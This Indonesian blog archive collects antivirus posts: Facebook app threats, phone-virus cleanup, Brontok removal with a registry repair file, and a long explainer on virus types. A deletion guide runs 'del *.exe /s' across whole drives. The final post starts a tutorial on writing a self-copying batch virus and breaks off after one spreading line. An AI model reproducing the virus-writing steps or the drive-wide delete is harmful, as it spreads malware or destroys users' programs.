Foto saya
saya lahir 18mei dijakarta, pekarjaan swasta telp : 085711812322, ym : setiadisaputra@yahoo.com no rek mandiri : 1260005912091 a/n setiyadi saputra
Tampilkan postingan dengan label Antivirus. Tampilkan semua postingan
Tampilkan postingan dengan label Antivirus. Tampilkan semua postingan

Hati2 Virus di FB anda...


Jakarta - Mulai dari 'McD' hingga 'Lindsay Lohan' dijadikan alat penyebaran aplikasi jahat di Facebook. Waspadalah! Karena aplikasi itu tak bisa dibasmi dengan software antivirus.



"Virus 'McD' mana bisa dibasmi dengan antivirus, itu eksploitasi di Facebook Apps. Kecuali bikin Apps di Facebook yang isinya antivirus, tapi jadinya dia harus mengawasi semua Apps yang ada di Facebook. Apa mampu?" kata Alfons Tanujaya, analis antivirus dari Vaksincom, saat dihubungi detikINET, Rabu (3/11/2010).

Lagipula, lanjut Alfons, keamanan komputer akan jauh lebih efektif apabila sang pengguna sendiri yang pro-aktif melindungi dirinya. "Banyak persepsi yang salah kalau sekuriti itu produk, yang bisa dibeli dan dikonsumsi, padahal kenyataannya security is a process," ia menambahkan.

Alfons pun berbagi dua tips untuk mengamankan diri dari serangan aplikasi jahat di Facebook. Berikut adalah tipsnya:

Jangan pernah approve aplikasi Facebook baru, khususnya yang berhubungan dengan plugin HD. Karena dengan approve (Allow) plugin itu otomatis memberikan akses kepada aplikasi atas profile kita.

1. Pengguna Facebook bisa mengatur pengamanan atas aplikasi, Games dan Websites melalui User Settings di Facebook. Sebagai contoh, kita bisa membatasi informasi pribadi apa saja yang bisa diakses oleh aplikasi dan website
2. Menurut Alfons, pihak Facebook sedang berusaha untuk terus memperbaiki keamanan situsnya. Namun pelaku yang tidak bertanggungjawab seringkali bisa memanfaatkan celah yang ada, seperti kasus 'McD' dan 'Lindsay Lohan' itu.


"Jadi pengguna aplikasi apapun selalu harus mengupdate dirinya dengan informasi ancaman terbaru dan jangan percaya kalau ada orang yang jualan dan jamin bisa mengamankan semua. Namanya juga orang jualan, kecap selalu nomor 1," ujarnya santai.
( wsh / wsh )
Selengkapnya...

Ponsel : Cara membersihkan Virus HP


Cara Membersihkan Virus Handphone

Virus memang menjengkelkan mulai dari virus penyakit yang menyerang manusia sampai virus komputer dan telepon selular atau handphone, terkecuali virus cinta yang bikin kita juga klepek- klepek he..he..



Sekarang Kita akan membahas cara mengatasi atau membersihkan virus dari ponsel atau handphone (HP) terutama virus yang menyerang Ponsel type Symbian V.60 yang kebanyakan handphone type nokia.

Kali ini kita fokus membahas cara membersihkan virus yang menyerang ponsel Nokia versi symbian 60 baik versi symbian 1st edition atau symbian 60 2nd edition antara lain Nokia 3230, 3650, 3660, 6600, 7610, 7650, N70 dan type lainya yang menggunakan system versi symbian 60 karena virus yang beredar kebanyakan menyerang ponsel type ini.

Berbagai virus Ponsel symbian antara lain : PBStealer, Virus beseko, Cabir, Locknut, Comwarior, Skulss, Doomboot, Appdisabler, Cardtrap, RommWar dan banyak virus ponsel lainnya.

Banyak macam ulah si virus tersebut antara lain bikin ponsel kita lelet loading, aplikasi tidak bisa dijalankan, mengirim file virus sendiri melalui bluetooth, handphone kita sering restart sendiri, baterey mudah habis, sampai virus yang mengakibatkan ponsel kita mengirim sms sendiri sehingga nomor handphone kita akan diblokir sms keluarnya oleh operator selular (biasanya operator Indosat).

Namun berbagai macam virus itu bisa kita bersihkan atau kita musnahkan dengan cara yang cukup mudah tanpa harus mengeluarkan biaya banyak hingga harus Instalasi Firm ulang atau yang dikenal dengan FLASH Firmware.

Bisa download caranya dan Rahasia nya Disini

Dengan langkah langkah di atas maka handphone anda sudah terbebas dari virus seperti baru lagi. Selamat mencoba !!

Sumber : Johar ESC Creation dot com
Selengkapnya...

Membasmi virus Brontok

Rontokbro bisa dianggap sebagai virus 'biang kerok' lantaran menjadi inspirasi bagi para pembuat virus lokal untuk 'berkreasi'. Kini, virus yang mampu melumpuhkan sejumlah fungsi di OS Windows tersebut kembali menebar teror.


Simak 5 langkah untuk mengenyahkannya menurut analis virus dari Vaksincom, Adang Jauhar Taufik:

1. Disable 'System Restore' (Windows XP/Vista/Windows 7) selama proses pembersihan dilakukan.

2. Matikan proses yang aktif di memori. Norman Security Suite Pro yang dilengkapi dengan fitur Advanced System Reporter menjadi salah satu tools alternatif yang dapat digunakan untuk mengganti tools Task Manager yang diblok oleh virus dengan nama lain W32/Rontokbro.GOL itu.

Berikut langkah untuk mematikan proses virus yang aktif di memori dengan menggunakan Advanced System Reporter.
-. Pada aplikasi Advanced System Reporter, klik tabulasi.
-. Klik kanan pada file virus [lsass.exe, services.exe dan winlogon.exe atau file lain] yang berada di direktori 'C:\Documents and settings\%user%\Local Settings\Application Data'
-. Klik 'Terminate Process', lalu 'Yes'.

Untuk menghapus registry autostart yang dibuat oleh virus, lakukan langkah berikut:
>. Klik tabulasi 'Autostart'.
>. Klik kanan file virus [smss.exe dan Yitnoss.exe] atau file lain yang berada di direktori 'C:\Documents and settings\%user%\Local Settings\Application Data'.
>. Klik 'Terminate Process' jika proses tersebut masih aktif.
>. Kemudian klik "Remove Autorun" untuk menghapus registry autostart yang telah dibuat oleh virus.

3. Pulihkan registri yang sudah diubah oleh virus, untuk mempercepat proses pemulihan silahkan salin script berikut pada program notepad kemudian simpan dengan nama REPAIR.INF, Install file tersebut dengan cara [Klik kanan REPAIR.INF | Install]


[Version]

Signature="$Chicago$"

Provider=Vaksincom Oyee


[DefaultInstall]

AddReg=UnhookRegKey

DelReg=del


[UnhookRegKey]

HKLM, Software\CLASSES\batfile\shell\open\command,,,"""%1"" %*"

HKLM, Software\CLASSES\comfile\shell\open\command,,,"""%1"" %*"

HKLM, Software\CLASSES\exefile\shell\open\command,,,"""%1"" %*"

HKLM, Software\CLASSES\piffile\shell\open\command,,,"""%1"" %*"

HKLM, Software\CLASSES\regfile\shell\open\command,,,"regedit.exe "%1""

HKLM, Software\CLASSES\scrfile\shell\open\command,,,"""%1"" %*"

HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, Shell,0, "Explorer.exe"


[del]


HKCU, Software\Microsoft\Windows\CurrentVersion\Run, X84-YitnoDiah

HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Run, Diah-YitnosX84

HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoFolderOptions

HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableCMD

HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableRegistryTools



4. Hapus file induk dan file duplikat yang dibuat oleh virus dengan menggunakan fungsi Search Windows di semua Drive termasuk Removable Disk [Flash Disk]. Kemudian hapus file berikut: C:\Documents and settings\%user%\Local Settings\Application Data
-. Winlogon.exe
-. services.exe
-. lsass.exe
-. smss.exe
-. inetinfo.exe
-. Diah84.Yitn.oss.txt
-. csrss.exe

* C:\Windows\Inf\Yitnoss.exe
* C:\Documents and settings\%user%\Start Menu\Programs\Startup\YITNO.pif
* C:\Documents and Settings\%user%\Templates\B.Yitnoss.com

Hapus juga file/folder berikut:

C:\Documents and settings\%user%\Local Settings\Application Data

-. 84-DiahLove-Yitn-oss
-. Yitn.oss-3-27
-. Yitn.oss-3-31
-. Diah84.Yitn.oss.txt
5. Untuk pebersihan optimal silahkan install dan scan dengan antivirus yang up-to-date. Anda juga dapat menggunakan tools Malware Cleaner, silahkan download di
SINI
Selengkapnya...

Indonesia juga punya Antivirus lho..!!

Smadav dibuat dengan tujuan untuk membersihkan dan melindungi komputer Anda dari virus-virus lokal yang banyak menyebar di Indonesia..


Kalau Anda sering berinternet atau sering meng-install program-program baru, Anda tetap sangat disarankan untuk menggabungkan Smadav dengan Antivirus Impor (misalnya yang gratis adalah Avira, AVG, atau Avast, dan yang berbayar adalah Kasperksy, Norton, atau NOD32). Smadav bisa bekerjasama dengan hampir semua antivirus impor sehingga komputer Anda benar-benar terlindungi dari infeksi virus lokal maupun virus asing (global). Saat ini Smadav 2010 sudah mengenali sebagian besar virus lokal yang menyebarluas di Indonesia. Inilah alasan-alasan kenapa menggunakan Smadav :

* Teknologi SmaRTP, SmaRT-Protection
* Teknologi Smad-Behavior
* Teknologi Smad-Lock
* Scanner pintar (Intelligence)
* Cleaner Dokumen Terinfeksi
* Pembersihan & perbaikan (1500 value) Registry
* Update terbaru di setiap Revisi
* Senjata Manual sangat mudah digunakan
* Gratis
* Portable dan support OS Windows 2000/XP/Vista/7
Download Smadav Free
Selengkapnya...

Apa sih Virus komputer itu??

Kita sering mengalami ketakutan yang berlebihan dengan virus komputer disebabkan oleh ketidaktahuan/kebutaan pengetahuan akan virus komputer itu sendiri,kita dapat menghilangkan rasa ketakutan tersebut dengan lebih jauh mengenal virus komputer. Untuk itu mari kita mengenal lebih jauh virus komputer….


ASAL MUASAL VIRUS

Virus komputer pertama kalinya tercipta bersamaan dengan komputer. Pada tahun 1949, salah seorang pencipta komputer, John von Newman, yang menciptakan Electronic Discrete Variable Automatic Computer (EDVAC),memaparkan suatu makalahnya yang berjudul “Theory and Organization of Complicated Automata”. Dalam makalahnya dibahas kemungkinan program yang dapat menyebar dengan sendirinya. Perkembangan virus komputer selanjutnya terjadi di AT&T Bell Laboratory salah satu laboratorium komputer terbesar didunia yang telah menghasilkan banyak hal, seperti bahasa C dan C++.1 Di laboratorium ini, sekitar tahun 1960-an, setiap waktu istirahat para peneliti membuat permainan dengan suatu program yang dapat memusnahkan kemampuan membetulkan dirinya dan balik menyerang kedudukan lawan. Selain itu, program permainan dapat memperbanyak dirinya secara otomatis. Perang program ini disebut Core War, yaitu pemenangnya adalah pemilik program sisa terbanyak dalam selang waktu tertentu. Karena sadar akan bahaya program tersebut, terutama bila bocor keluar laboratorium tersebut, maka setiap selesai permainan, program tersebut selalu dimusnahkan. Sekitar tahun 1970-an ,perusahaan Xerox memperkenalkan suatu program yang digunakan untuk membantu kelancaran kerja. Struktur programnya menyerupai virus, namun program ini adalah untuk memanfaatkan waktu semaksimal mungkin dan pada waktu yang bersamaan dua tugas dapat dilakukan. Pada tahun 1980-an, perang virus di dunia terbuka bermula atas pemaparan Fred Cohen, seorang peneliti dan asisten profesor di Universitas Cincinati, Ohio. Dalam pemaparannya, Fred juga mendemonstrasikan sebuah program ciptaannya, yaitu suatu virus yang dapat menyebar secara cepat pada sejumlah komputer. Sementara virus berkembang, Indonesia juga mulai terkena wabah virus. Virus komputer ini pertama menyebar di Indonesia juga pada tahun 1988. Virus yang begitu menggemparkan seluruh pemakai komputer di Indonesia, saat itu, adalah virus ©Brain yang dikenal dengan nama virus Pakistan.

PENGERTIAN VIRUS "A program that can infect other programs by modifying them to include a slighty altered copy of itself. A virus can spread throughout a computer system or network using the authorization of every user using it to infect their programs. Every programs that gets infected can also act as a virus that infection grows“ ( Fred Cohen ) Pertama kali istilah “virus” digunakan oleh Fred Cohen pada tahun 1984 di Amerika Serikat. Virus komputer dinamakan “virus” karena memiliki beberapa persamaan mendasar dengan virus pada istilah kedokteran (biological viruses). Virus komputer bisa diartikan sebagai suatu program komputer biasa. Tetapi memiliki perbedaan yang mendasar dengan program-program lainnya,yaitu virus dibuat untuk menulari program-program lainnya, mengubah, memanipulasinya bahkan sampai merusaknya. Ada yang perlu dicatat disini, virus hanya akan menulari apabila program pemicu atau program yang telah terinfeksi tadi dieksekusi. Virus yang terdapat pada komputer hanyalah berupa program biasa, sebagaimana layaknya program-program lain. Tetapi terdapat perbedaan yang sangat mendasar pada virus komputer dan program lainnya.

KRITERIA VIRUS
Suatu program dapat disebut sebagai suatu virus apabila memenuhi minimal 5 kriteria berikut : 1. Kemampuan untuk mendapatkan informasi 2. Kemampuan untuk memeriksa suatu program 3. Kemampuan untuk menggandakan diri dan menularkan diri 4. Kemampuan melakukan manipulasi 5. Kemampuan untuk menyembunyikan diri. Sekarang akan coba dijelaskan dengan singkat apa yang dimaksud dari tiap-tiap kemampuan itu dan mengapa ini sangat diperlukan :

Kemampuan untuk mendapatkan informasi
Pada umumnya suatu virus memerlukan daftar nama-nama file yang ada dalam suatu directory. Untuk apa? Agar dia dapat memperoleh daftar file yang bisa dia tulari. Misalnya, virus makro yang akan menginfeksi semua file data MS Word, akan mencari daftar file berekstensi *.doc. Disinilah kemampuan mengumpulkan informasi itu diperlukan agar virus dapat membuat daftar/data semua file, lalu memilahnya dengan mencari file-file yang bisa ditulari. Biasanya data ini tercipta saat file yang tertular/terinfeksi virus atau file program virus itu sendiri dibuka oleh user. Sang virus akan segera melakukan pengumpulan data dan menaruhnya (biasanya) di RAM, sehingga apabila komputer dimatikan semua data hilang. Tetapi data-data ini akan tercipta kembali setiap kali virus itu diaktifkan. Biasanya data-data ini disimpan juga sebagai hidden file oleh virus tersebut.

Kemampuan memeriksa suatu program Suatu virus juga harus bisa memeriksa suatu file yang akan ditulari, misalnya dia bertugas menulari program berekstensi *.doc, maka dia harus memeriksa apakah file dokumen tersebut telah terinfeksi ataupun belum, karena jika sudah, akan percuma menularinya lagi. Ini sangat berguna untuk meningkatkan kemampuan suatu virus dalam hal kecepatan menginfeksi suatu file/program. Yang umum dilakukan oleh virus adalah memiliki/memberi tanda pada file/program yang telah terinfeksi sehingga mudah untuk dikenali oleh virus tersebut. Contoh penandaan adalah misalnya memberikan suatu byte yang unik di setiap file yang telah terinfeksi.

Kemampuan untuk menggandakan diri Kalo ini memang virus "banget", maksudnya, tanpa kemampuan ini tak adalah virus. Inti dari virus adalah kemampuan mengandakan diri dengan cara menulari file lainnya. Suatu virus apabila telah menemukan calon korbannya maka ia akan mengenalinya dengan memeriksanya. Jika belum terinfeksi maka sang virus akan memulai aksinya penularan dengan cara menuliskan byte pengenal pada file tersebut, dan seterusnya mengcopikan/menulis kode objek virus diatas file sasaran. Beberapa cara umum yang dilakukan oleh virus untuk menulari/menggandakan dirinya adalah :
a. OverWriting Virus / Menimpa Target Virus jenis ini akan merusak file yang ditulari, biasanya virus ini dibuat oleh programer virus yang kurang berpengalaman. karena dia akan menimpa program aslinya dengan program virus itu sendiri, sehingga program aslinya tidak dapat dijalankan. program aslinya menjadi lebih pendek, dari sebelumnya, karena virus telah menimpa program tersebut, dan dapat dipastikan program asli tersebut tidak akan jalan,yang jalan hanya virusnya.
b. Appending Virus / Menempel Target Virus jenis ini merupakan virus tingkat lanjut, dan hanya programer virus tingkat menengah dan lanjut yang dapat memprogram virus jenis ini, karena tingkat kesulitannya lebih tinggi.virus jenis ini biasannya tidak merusak program yang ditulari, sehingga program yang sudah terinfeksi masih dapat dijalankan seperti biasa, dengan catatan tidak ada "BUG" di virus tersebut, sehingga lebih sulit menditeksi virus jenis ini, sehingga penyebarannya menjadi lebih cepat.
c. Virus jenis ini lain cara penyebarannya / penularannya, mekanisme penularan dari virus ini adalah dia membuat file dengan nama yang sama dengan file korbannya, tetapi dengan akhiran .COM. karena sisitem komputer MS-DOS mempunyai sistem, yang apabila ada dua nama file yang sama, tetapi extensinya berbeda, yaitu .EXE dan .COM, maka file .COM dahulu yang akan dijalankan, maka dari itu virus ini membuat file dengan nana yang sama dengan korbannya., mekanismenya..

Kemampuan mengadakan manipulasi

Rutin (routine) yang dimiliki suatu virus akan dijalankan setelah virus menulari suatu file. Isi dari suatu rutin ini dapat beragam mulai dari yang tidak berbahaya sampai yang melakukan perusakan. Rutin ini umumnya digunakan untuk memanipulasi file atau pun mempopulerkan pembuatnya ! Rutin ini memanfaatkan kemampuan dari suatu sistem operasi (Operating System), sehingga memiliki kemampuan yang sama dengan yang dimiliki sistem operasi. Misal : a. Membuat gambar atau pesan pada monitor b. Mengganti/mengubah-ubah label dari tiap file, direktori, atau label dari drive di PC c. Memanipulasi file yang ditulari d. Merusak file e. Mengacaukan kerja printer, dsb

Kemampuan Menyembunyikan diri
Kemampuan menyembunyikan diri ini harus dimiliki oleh suatu virus agar semua pekerjaan baik dari awal sampai berhasilnya penularan dapat terlaksana. Langkah langkah yang biasa dilakukan adalah: Program virus disimpan dalam bentuk kode mesin dan digabung dengan program lain yang dianggap berguna oleh pemakai - Program virus diletakkan pada Boot Record atau track pada disk yang jarang diperhatikan oleh komputer itu sendiri - Program virus dibuat sependek mungkin, dan hasil file yang diinfeksi tidak terlalu berubah ukurannya - Virus tidak mengubah keterangan/informasi waktu suatu file - dll

SIKLUS HIDUP VIRUS Siklus hidup virus secara umum, melalui 4 tahap: 1. Dormant phase ( Fase Istirahat/Tidur ) Pada fase ini virus tidaklah aktif. Virus akan diaktifkan oleh suatu kondisi tertentu, semisal: tanggal yang ditentukan, kehadiran program lain/dieksekusinya program lain, dsb. Tidak semua virus melalui fase ini. 2. Propagation phase ( Fase Penyebaran ) Pada fase ini virus akan mengkopikan dirinya kepada suatu program atau ke suatu tempat dari media storage (baik hardisk, RAM dsb). Setiap program yang terinfeksi akan menjadi hasil “kloning” virus tersebut (tergantung cara virus tersebut menginfeksinya). 3. Trigerring phase ( Fase Aktif ) Di fase ini virus tersebut akan aktif dan hal ini juga di picu oleh beberapa kondisi seperti pada Dormant Phase. 4. Execution phase ( Fase Eksekusi ) Pada fase inilah virus yang telah aktif tadi akan melakukan fungsinya. Seperti menghapus file, menampilkan pesan-pesan, dsb JENIS – JENIS VIRUS Untuk lebih mempertajam pengetahuan kita tentang virus, saya akan coba memberikan penjelasan tentang jenis-jenis virus yang sering berkeliaran di masyarakat umum.
1. Virus Makro

Jenis virus ini pasti sudah sangat sering kita dengar. Virus ini ditulis dengan bahasa pemrograman dari suatu aplikasi bukan dengan bahasa pemrograman dari suatu Operating System. Virus ini dapat berjalan apabila aplikasi pembentuknya dapat berjalan dengan baik. Sebagai contoh jika pada komputer mac dijalankan aplikasi Word, maka virus makro yang dibuat dari bahasa makro Word dapat bekerja pada komputer bersistem operasi Mac ini. Contoh virus: - Varian W97M, misal W97M.Panther Panjang 1234 bytes, akanmenginfeksi NORMAL.DOT dan menginfeksi dokumen apabila dibuka. - WM.Twno.A;TW Panjang 41984 bytes, akan menginfeksi Dokumen Ms.Word yang menggunakan bahasa makro, biasanya berekstensi *.DOT dan *.DOC - dll
2. Virus Boot Sector

Virus Boot sector ini sudah umum sekali menyebar. Virus ini dalam menggandakan dirinya, akan memindahkan atau menggantikan boot sector asli dengan program booting virus. Sehingga saat terjadi booting maka virus akan diload ke memori dan selanjutnya virus akan mempunyai kemampuan mengendalikan hardware standar (contoh : monitor, printer dsb) dan dari memori ini pula virus akan menyebar ke seluruh drive yang ada dan yang terhubung ke komputer (contoh : floopy, drive lain selain drive c:). Pekerjaan pokok yang harus dilakukan virus boot sector secara umum mencakup 3 hal yaitu :
1. Virus harus menyimpan bootsector atau partisi asli ke suatu tempat pada disket atau hardisk dan mengganti data-data pada boot sector dengan program virus itu sendiri, yang kemudian setelah virus boot sector itu dijalankan baru dia akan memanggil data-data boot sector asli atau data-data system.
2. Virus harus tinggal dimemory setelah system berjalan dan akan memperbanyak dirinya pada setiap kondisi tertentu, kondisi ini biasanya kalau ada proses baca atau tulis pada disket
3. Virus umumnya mempunyai Routine / tugas khusus yang disertakan oleh pembuatnya seperti menampilkan kata-kata, gambar atau juga logic Bom seperti melakukan pemformatan terhadap Hard Disk pada tanggal tertentu dan lain sebagainya.

Contoh virus : - Varian virus wyx ex: wyx.C(B) menginfeksi boot record dan floopy ; Panjang :520 bytes; Karakteristik memory resident dan terenkripsi. - Varian V - Sign : Menginfeksi : Master Boot Record ; Panjang 520 bytes; Karakteristik : menetap di memori (memory resident),terenkripsi, dan polymorphic) - Stoned.june 4th/ bloody!: Menginfeksi : Master Boot Record dan floopy; Panjang 520 bytes; Karakteristik : menetap di memori (memory resident), terenkripsi dan menampilkan pesan "Bloody!june 4th 1989" setelah komputer melakukan booting sebanyak 128 kali.
3. Stealth Virus

Virus ini akan menguasai tabel interrupt pada DOS yang sering kita kenal dengan "Interrupt interceptor". Virus ini berkemampuan untuk mengendalikan instruksi-instruksi level DOS dan biasanya mereka tersembunyi sesuai namanya baik secara penuh ataupun ukurannya. Contoh virus : - Yankee.XPEH.4928, Menginfeksi file *.COM dan *.EXE ; Panjang 4298 bytes; Karakteristik: menetap di memori, ukurantersembunyi, memiliki pemicu - WXYC (yang termasuk kategori boot record pun karena masuk kategri stealth dimasukkan pula disini), Menginfeksi floopy an motherboot record; Panjang 520 bytes; Karakteristik : menetap di memori; ukuran dan virus tersembunyi. - Vmem(s): Menginfeksi file file *.EXE, *.SYS, dan *.COM ; Panjang fie 3275 bytes; Karakteristik:menetap di memori, ukuran tersembunyi, di enkripsi. - dll
4. Polymorphic Virus

Virus ini Dirancang buat mengecoh program antivirus, artinya virus ini selalu berusaha agar tidak dikenali oleh antivirus dengan cara selalu merubah rubah strukturnya setiap kali selesai menginfeksi file/program lain. Contoh virus: - Necropolis A/B, Menginfeksi file *.EXE dan *.COM; Panjang file 1963 bytes; Karakteristik: menetap di memori, ukuran dan virus tesembunyi,terenkripsi dan dapat berubah ubah struktur - Nightfall, Menginfeksi file *.EXE; Panjang file 4554 bytes; Karakteristik : menetap di memori, ukuran dan virus tesembunyi,memiliki pemicu, terenkripsidan dapat berubah-ubah struktur - dll

5. Virus File/Program

Virus ini menginfeksi file-file yang dapat dieksekusi langsung dari sistem operasi, baik itu file *.EXE, maupun *.COM biasanya juga hasil infeksi dari virus ini dapat diketahui dengan berubahnya ukuran file yang diserangnya. Virus Komputer ini juga dapat menyerang file Documen dalam Windows dengan extensi DOC, selain itu virus-virus file baru banyak yang diprogram dibawah sistem operasi windows, dan sudah tidak menggunakan Low Level Language (Assembly) , melainkan dengan High Level Language (HLL). Virus Komputer ini biasa dirtulis dengan Visual Basic, Java Script, VB Script, Visual C++ dan lain sebagainya. Biasanya virus yang diprogram dengan HLL ini dapat disebarkan melalui Internet dalam bentuk E-mail Attachment , Virus Komputer jenis ini lebih luas dan lebih cepat perkembangannya di banding kan virus file yang beroperasi dalam lingkungan DOS
6. Multi Partition Virus

Virus ini merupakan gabungan dari virus boot sector dan virus file. Artinya pekerjaan yang dilakukan berakibat dua, yaitu dia dapat menginfeksi file-file *.EXE atau *.COM dan juga menginfeksi boot sector. Menurut Rutin Aktivasi Berdasarkan rutin-rutinnya Virus Komputer dapat dibedakan menjadi 3 kelompok besar, yang dimasukan kedalam kategori tingkat bahaya / keganasan dari virus yaitu virus jinak, ganas, dan virus destruktif, yang didalamnya masing-masing dibagi lagi menjadi beberapa bagian yaitu :
1. Virus Jinak

Virus dengan rutin / tugas yang dibebankan kepadannya tidak melakuan aksi-aksi destruktif , maka akan disebut virus junak, biasannya virus jenis ini melakukan hal-hal seperti dibawah ini
1. Rutin untuk menampilkan gambar atau tulisan kelayar
2. Rutin untuk membunyikan port untuk speaker dengan nada-nada tertentu, seperti irama lagu ( Virus Mozzart ), tembakan ( VCL Based Virus ).
3. Rutin untuk mempause / menghentikan komputer setelah beberapa jam komputer yang terinfeksi dipakai.Contohnya Virus Ambulance
4. Rutin untuk mengurangi ram , sehingga komputer berjalan lebih lambat, yaitu walaupun memakai Prosesor P.II 233 Mhz akan seperti Proc. 486
5. Rutin untuk merestart komputer pada waktu-waktu tertentu ( NRLG Based Virus )
6. Rutin untuk mengacaukan keyboard, seperti mengacaukan letak huruf pada keyboard (Virus KeyPress ), atau memindahkan susunan tombol kyboard 1 tombol disebelahnya ( Virus Typo COM

2. Virus Ganas

Yang termasuk dari jenis virus ini adalah virus-virus yang mempunyai aksi-aksi yang merugikan, dan biasanya kerugian yang diakibatkan oleh jenis virus ini tidak dapat dipulihkan.Yang termasuk rutin / aksi yang merugikan atau berbahaya dari virus ini adalah:
1. Rutin untuk menghapus file, atau seluruh file dalam disket maka data pada disket tersebut akan hilang, contoh dari virus ini BLODY Virus.
2. Rutin untuk memformat hard disk, maka otomatis data yang ada pada hard disk juga akan ikut hilang, contoh dari virus ini adalah virus AIDS II
3. Overwriting file target, rutin ini akan merusak program yang ditulari, sehingga program tidak dapat dipakai lagi, sebagai contoh dari virus ini adalah VOOTIE.B.66 virus, yang akan mengoverwrite permulaan file targetnya sebanyak panjang badan virus, yaitu 66 Bytes.
4. Rutin untuk Mengacaukan kerja primnter, yang akan merusak dokumen yang akan dicetak atau diprint, contohnya virus SUPERNOVA.
5. Rutin untuk membebani Server atau attachment E-Mail, rutin ini biasanya digunakan oleh virus yang bekerja dibawah file operasi Windows , atau unix , sebagai contoh virus Melissa, virus Prilissa.
3. Virus Destruktif

Virus Komputer jenis destruktif Ini yang biasanya paling ditakuti orang, karena daya rusaknya yang besar dan juga dapat menghancurkan sofware maupun hard ware, sehingga kerugian yang diakibatkan oleh Virus Komputer jenis ini sangat besar, karena mereka banyak melakukan perusakan terhadap hardware, contoh rutin yang termasuk kategori destruktif antara lain:
1. Rutin penghancuran FAT dan atau Directory pada hard disk , dengan cara melakukan pemformatan pada track 2, sector 0, sampai track 3 sector 1 pada side 0 sehingga harddisk tidak akan bisa dipakai, atau membuat Bad Sector Pada side 0, tarck 0, sector 0 ( Pada boot record ), sehingga harddisk tidak dapat diformat. Contoh dari virus ini adalah DEVIL DANCE Virus.
2. Rutin menghancurkan BIOS, sehingga komputer tidak mengenali lagi peripherial yang dipasang pada komputer tersebut, sehingga akan merusak hard disk, Main board, contoh virus ini adalah virus CIH yang dibuat oleh Cheng Ing Hau

BEBERAPA CARA PENYEBARAN VIRUS Virus layaknya virus biologi harus memiliki media untuk dapat menyebar, virus komputer dapat menyebar ke berbagai komputer/mesin lainnya juga melalui berbagai media, diantaranya:
1. Disket, media storage R/W Media penyimpanan eksternal dapat menjadi sasaran empuk bagi virus untuk dijadikan media. Baik sebagai tempat menetap ataupun sebagai media penyebarannya. Media yang bisa melakukan operasi R/W (Read dan Write) sangat memungkinkan untuk ditumpangi virus dan dijadikan sebagai media penyebaran.
2. Jaringan ( LAN, WAN,dsb) Hubungan antara beberapa computer secara langsung sangat memungkinkan suatu virus ikut berpindah saat terjadi pertukaran/pengeksekusian file yang mengandung virus.

Selengkapnya...

Menghapus Virus Melalui Command Prompt

Jika sebelumnya kita telah berkenalan dengan berbagai jenis virus marilah kita mulai menghapus virus-virus tersebut. Kita akan menghapusnya dengan tool standar bawaan Windows dengan sedikit modifikasi yaitu Command Prompt.


Sebelumnya telah dijelaskan beberapa file yang berpotensi atau digunakan oleh virus, diantaranya adalah autorun.inf, *.exe, *.pif, *.scr, *.vbs, *. _desktop.ini, desktop_.ini, Thumbs .db dan thumbs.com. File-file dengan ekstensi tersebutlah yang akan kita hapus manual dengan command prompt.

Bukalah command prompt yang tidak perlu aku jelaskan caranya. Setelah muncul jendelanya, ketikkan drive mana yang akan dituju lalu ditambah tanda titik dua “:” misalnya “D:” kemudian tekan enter. Kalau sudah masuk, kita tinggal masukkan perintahnya. Misalnya ingin menghapus file *.exe yang biasanya ekstensi ini yang paling banyak virus gunakan, ketikkan del *.exe /s kemudian tekan enter. Maka semua file yang berekstensi exe yang ada drive itu akan terhapus. Penambahan perintah”/s” artinya akan melaksanakan perintah hingga ke sub folder yang paling dalam. Tanpa perintah tersebut maka hanya akan berlaku pada folder/darive yang sedang aktif saja.

Sekarang satu jenis file pemicu sudah terhapus. Artinya satu kekhawatiran terhadap virus sudah berkurang. Selanjutnya lakukan penghapusan untuk jenis file yang lain yang sudah disebutkan di atas sehingga semuanya menjadi tuntas.

Biasanya virus sudah memproteksi diri dengan mengatur attributnya sendiri baik itu menjadi readonly, hidden biasa atau hidden secara system. File yang punya attribut readonly tidak bisa dihapus dengan cara di atas. Oleh karena itu perlu dilakukan reset attribut dengan command prompt. Perintahnya yaitu attrib –r –h –s –a /s. Attribut r artinya readonly, h artinya hidden, s artinya system atau orang-orang sering menyebuatnya super hidden sedangkan a artinya file archive atau arsip. Penambahan tanda minus (-) artinya untuk tidak mengaktifkan attibut setelahnya. Begitu pula kalau ingin mengaktifkannya tinggal tambahkan tanda plus (+).

Tentunya tidak efisien kalau setiap komputer terserang virus maka harus mengetikkan satu per satu perintah perintah di atas di command prompt. Jadi, semua perintah tadi sudah aku rangkum dalam sebuah file batch. Namanya ba.bat yang bisa didownload di sini.

Dari namanya, file ini fungsinya membabat seluruh file yang tentunya telah ditentukan sebelumnya. Cara menggunakannya sangat mudah tinggal dieksekusi langsung atau dipanggil lewat command prompt atau menu Run. Tampilannya pun sangat sederhana hanya sebuah jendela kecil dengan beberapa pilihan perintah di dalamnya. Terdapat tiga pilihan utama yaitu babat tuntas, babat cepat dan pilihan keluar. Untuk memilih perintah yang akan dilaksanakan tinggal masukkan angka 1, 2 atau 3 sesuai dengan pilihan lalu tekan enter.

Pilihan babat tuntas digunakan kalau file yang berpotensi terhadap virus banyak terdapat di setiap folder. Sedangkan babat cepat sangat efisien kalau menghadapi virus yang memanfaatkan autorun dan kita yakin benar kalau virus tidak terdapat di dalam folder sehingga tidak perlu lama-lama menunggu.

File ba.bat bukan digunakan hanya untuk drive hardisk tapi ditujukan terutama untuk FD. Setelah FD dicolok jangan dulu membuka Windows Explorer tapi eksekusilah dulu file ba.bat yang sudah disimpan di FD baik menggunkan Command Prompt atau menu Run. Jika ada file yang ada dalam daftar tidak mau terhapus maka patut dicurigai kalau komputer sudah terinfeksi virus.

Inilah tadi cara mengapus atau tepatnya membabat file yang berpotensi terhadap virus. Memang sangat beresiko. Seri berikutnya kita akan membahas bagaimana mencegah virus terus berkembang termasuk mengurangi resiko di atas.
Selengkapnya...

Iseng2 bikin virus

Hei bro, gue kali ini mau mengajarkan tentang cara membuat virus sederhana dengan menggunakan notepad…





Alogaritmanya adalah

1.ketika virus akan dijalankan,maka virus akan mencopykan dirinya ke dalam drive A,C,D,E dan F

Alogaritmanya adalah:

For %%p in (A C D E F) do copy %0 %%p:

2.Selanjutnya virus akan mendata seluruh file bereksitensi *.Doc yang ada di drive A,C,D,E dan F

Alogaritmanya adalah:

